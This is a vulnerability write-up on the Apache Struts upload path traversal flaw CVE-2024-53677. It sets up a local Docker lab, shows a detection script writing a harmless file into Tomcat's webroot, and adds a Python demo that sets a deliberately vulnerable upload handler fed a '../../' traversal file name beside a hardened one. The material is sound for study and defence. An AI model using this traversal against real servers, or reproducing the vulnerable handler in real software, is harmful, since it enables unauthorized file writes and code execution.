0xPThree.gitbook.io
Struts - CVE-2024-53677 / S2-067

Last updated 4 months ago


The legacy file upload logic in Apache Struts (the FileUploadInterceptor) is flawed: an attacker can manipulate the file upload parameters so that the name under which the uploaded file is stored contains path traversal sequences. Under some circumstances this lets the attacker write a file of their choosing to a location of their choosing, such as the web root, which in turn can be used to achieve Remote Code Execution. Note that upgrading alone is not sufficient: the fix in Struts 6.4.0 introduced a new upload mechanism (the Action File Upload Interceptor), and applications that keep using the old FileUploadInterceptor remain exposed even on a patched release. Apache's advice is to upgrade to 6.4.0 or later and migrate to the new mechanism.

Vulnerable versions:

  • Struts 2.0.0 - 2.3.37 (End-of-Life)
  • Struts 2.5.0 - 2.5.33
  • Struts 6.0.0 - 6.3.0.2

Proof-of-Concept

Setup test environment

» git clone git@github.com:0xPThree/struts_cve-2024-53677.git
» cd struts_cve-2024-53677
» sudo docker build --ulimit nofile=122880:122880 -m 3G -t struts-6.3.0.1 .
» sudo docker run -p 8081:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name struts-6.3.0.1 struts-6.3.0.1
» curl http://127.0.0.1:8081/upload.action

<html>
  <head>
    <title>File upload</title>
  </head>
  <body>
    <h1>Apache Struts 6.3.0.1</h1>
    <p>Welcome to Apache Struts 6.3.0.1 lab. This application is vulnerable to CVE-2023-50164 and CVE-2024-53677.</p>
    <form id="upload" name="upload" action="/upload.action;jsessionid=196954CE343A603EC7EE26FFF611D302" method="post" enctype="multipart/form-data">
      <table class="wwFormTable">
        <tr>
          <td class="tdLabel"></td>
          <td 
            class="tdInput"            
            ><input type="file" name="upload" id="upload_upload"/></td>
        </tr>
        <tr>
          <td colspan="2">
            <div class="formButton"><input type="submit" value="Submit" id="upload_0"/></div>
          </td>
        </tr>
      </table>
    </form>
  </body>
</html>

Exploit

First confirm that the probe file does not yet exist on the target, then run the check script against the upload endpoint. The script uploads a harmless text file under an attacker-chosen name; if the server honours that name, the file appears directly in Tomcat's webapps/ROOT and is served back, which proves the path traversal works.

» curl http://127.0.0.1:8081/vuln_test.txt                                  
<!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [&#47;vuln_test.txt] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.98</h3></body></html>

» python3 check.py -u http://127.0.0.1:8081 --upload_endpoint /upload.action
2025-01-07 12:21:20,822 [INFO] Starting detection process...
2025-01-07 12:21:20,822 [INFO] Starting detection for CVE-2024-53677 (S2-067)...
2025-01-07 12:21:20,823 [INFO] Sending test request to upload endpoint: http://127.0.0.1:8081/upload.action
2025-01-07 12:21:20,838 [INFO] [INFO] File upload request succeeded.
2025-01-07 12:21:20,838 [WARNING] [ALERT] File name overwrite detected. Target may be vulnerable!
2025-01-07 12:21:20,838 [INFO] Detection process completed.

» curl http://127.0.0.1:8081/vuln_test.txt                                  
CVE-2024-53677 / S2-067 detection test.

» sudo docker exec -it struts-6.3.0.1 bash
root@b991eecb47b4:/usr/local/tomcat# cd webapps/ROOT
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# ls -al
total 28
drwxr-x--- 5 root root 4096 Jan  7 11:23 .
drwxr-xr-x 1 root root 4096 Jan  7 11:18 ..
drwxr-x--- 2 root root 4096 Jan  7 11:14 forbidden
-rw-r----- 1 root root  226 Jan  7 09:41 index.html
drwxr-x--- 3 root root 4096 Jan  7 11:14 META-INF
-rw-r----- 1 root root   39 Jan  7 11:23 vuln_test.txt
drwxr-x--- 4 root root 4096 Jan  7 11:14 WEB-INF
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# cat vuln_test.txt 
CVE-2024-53677 / S2-067 detection test.
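
Why the file name in the request matters is easier to see on disk than in the multipart body. The following is an added illustration, not code from this page, the check script, or Apache Struts: an old-style handler that joins a client-controlled name onto its upload directory, next to a hardened one that validates the name, stores under a server-chosen name, and re-checks that the resolved path stays inside the upload root. The Tomcat-like directory layout, the `WEB-INF/uploads` location and the traversal string are constructed for the demo; they mirror the lab outcome above (a file landing in `webapps/ROOT`) but are not taken from the Struts code.

```python
"""Path traversal through an upload file name: legacy vs. hardened handler.
Added example, not Struts or lab code; directory layout and inputs are
constructed for the demonstration."""
import os
import tempfile
import uuid
from pathlib import PurePosixPath


def is_safe_upload_name(client_name: str) -> bool:
    """True only for a bare file name: no separators, no traversal, no NUL."""
    if client_name in ("", ".", ".."):
        return False
    if "\\" in client_name or "\x00" in client_name:
        return False
    # Any '/' (absolute path or sub-path) makes .name differ from the input.
    return PurePosixPath(client_name).name == client_name


def vulnerable_save(upload_root: str, client_name: str, data: bytes) -> str:
    """Old-style handler: the client-supplied name becomes part of the path."""
    dest = os.path.join(upload_root, client_name)  # "../" segments are honoured
    with open(dest, "wb") as fh:
        fh.write(data)
    return os.path.realpath(dest)


def hardened_save(upload_root: str, client_name: str, data: bytes) -> str:
    """Validate the name, store under a server-chosen name, then verify the
    resolved destination is still inside the upload root (defence in depth)."""
    if not is_safe_upload_name(client_name):
        raise ValueError(f"rejected upload name: {client_name!r}")
    root = os.path.realpath(upload_root)
    dest = os.path.realpath(os.path.join(root, f"{uuid.uuid4().hex}.bin"))
    if os.path.commonpath([root, dest]) != root:
        raise ValueError("resolved path escapes upload root")
    with open(dest, "wb") as fh:
        fh.write(data)
    return dest


def inside(root: str, path: str) -> bool:
    """Is `path` located under `root` once both are fully resolved?"""
    root = os.path.realpath(root)
    return os.path.commonpath([root, os.path.realpath(path)]) == root


def demo() -> dict:
    """Reproduce the lab outcome on disk: a traversal name lands the file in
    the served webroot with the old handler and is refused by the new one."""
    with tempfile.TemporaryDirectory() as tmp:
        webroot = os.path.join(tmp, "webapps", "ROOT")            # assumed layout
        upload_root = os.path.join(webroot, "WEB-INF", "uploads")  # assumed
        os.makedirs(upload_root)
        payload = b"CVE-2024-53677 / S2-067 detection test.\n"
        traversal = "../../vuln_test.txt"                          # constructed

        vuln_dest = vulnerable_save(upload_root, traversal, payload)
        try:
            hardened_save(upload_root, traversal, payload)
            rejected = False
        except ValueError:
            rejected = True
        safe_dest = hardened_save(upload_root, "vuln_test.txt", payload)

        return {
            "vuln_escaped_root": not inside(upload_root, vuln_dest),
            "vuln_in_webroot": os.path.isfile(os.path.join(webroot, "vuln_test.txt")),
            "hardened_rejected_traversal": rejected,
            "hardened_stayed_inside": inside(upload_root, safe_dest),
            "hardened_used_client_name": os.path.basename(safe_dest) == "vuln_test.txt",
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two points carry over to reviewing real upload code: the client name must never become a path component (keep it as metadata at most), and the final resolved path should be checked against the upload root even after validation, so that a later bypass of the name filter still cannot reach the web root.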

References and check script source:

  • https://nvd.nist.gov/vuln/detail/CVE-2024-53677
  • https://cwiki.apache.org/confluence/display/WW/S2-067
  • https://xz.aliyun.com/t/13172?time__1311=GqmhkGOG8GkD%2FD0lD2nbDkYoiteSKcepD
  • https://github.com/TAM-K592/CVE-2024-53677-S2-067/tree/ALOK